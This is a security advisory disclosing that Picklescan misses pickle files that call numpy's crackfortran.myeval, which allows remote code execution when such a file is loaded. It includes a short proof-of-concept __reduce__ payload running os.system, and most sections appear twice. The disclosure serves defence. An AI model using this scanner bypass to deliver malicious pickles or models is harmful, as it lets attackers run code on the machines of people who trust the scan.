Headline
GHSA-3329-ghmp-jmv5: Picklescan is vulnerable to RCE through missing detection when calling numpy.f2py.crackfortran.myeval
Summary
Picklescan uses numpy.f2py.crackfortran.myeval, which is a function in numpy to execute remote pickle files.
Details
The attack payload executes in the following steps:
- First, the attacker crafts the payload by calling the numpy.f2py.crackfortran.myeval function in its reduce method
- Then, when the victim checks whether the pickle file is safe by using the Picklescan library and this library doesn’t detect any dangerous functions, they decide to use pickle.load() on this malicious pickle file, thus leading to remote code execution.
PoC
class RCE:
def __reduce__(self):
from numpy.f2py.crackfortran import myeval
return (myeval, ("os.system('ls')",))
Impact
Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded. Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.
Report by
Pinji Chen (cpj24@mails.tsinghua.edu.cn) from the NISL lab (https://netsec.ccert.edu.cn/about) at Tsinghua University, Guanheng Liu (coolwind326@gmail.com).
Summary
Picklescan uses numpy.f2py.crackfortran.myeval, which is a function in numpy to execute remote pickle files.
Details
The attack payload executes in the following steps:
- First, the attacker crafts the payload by calling the numpy.f2py.crackfortran.myeval function in its reduce method
- Then, when the victim checks whether the pickle file is safe by using the Picklescan library and this library doesn’t detect any dangerous functions, they decide to use pickle.load() on this malicious pickle file, thus leading to remote code execution.
PoC
class RCE:
def __reduce__(self):
from numpy.f2py.crackfortran import myeval
return (myeval, ("os.system('ls')",))
Impact
Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.
Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.
Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.
Report by
Pinji Chen (cpj24@mails.tsinghua.edu.cn) from the NISL lab (https://netsec.ccert.edu.cn/about) at Tsinghua University, Guanheng Liu (coolwind326@gmail.com).
References
- GHSA-3329-ghmp-jmv5
- mmaitre314/picklescan#53
- mmaitre314/picklescan@70c1c6c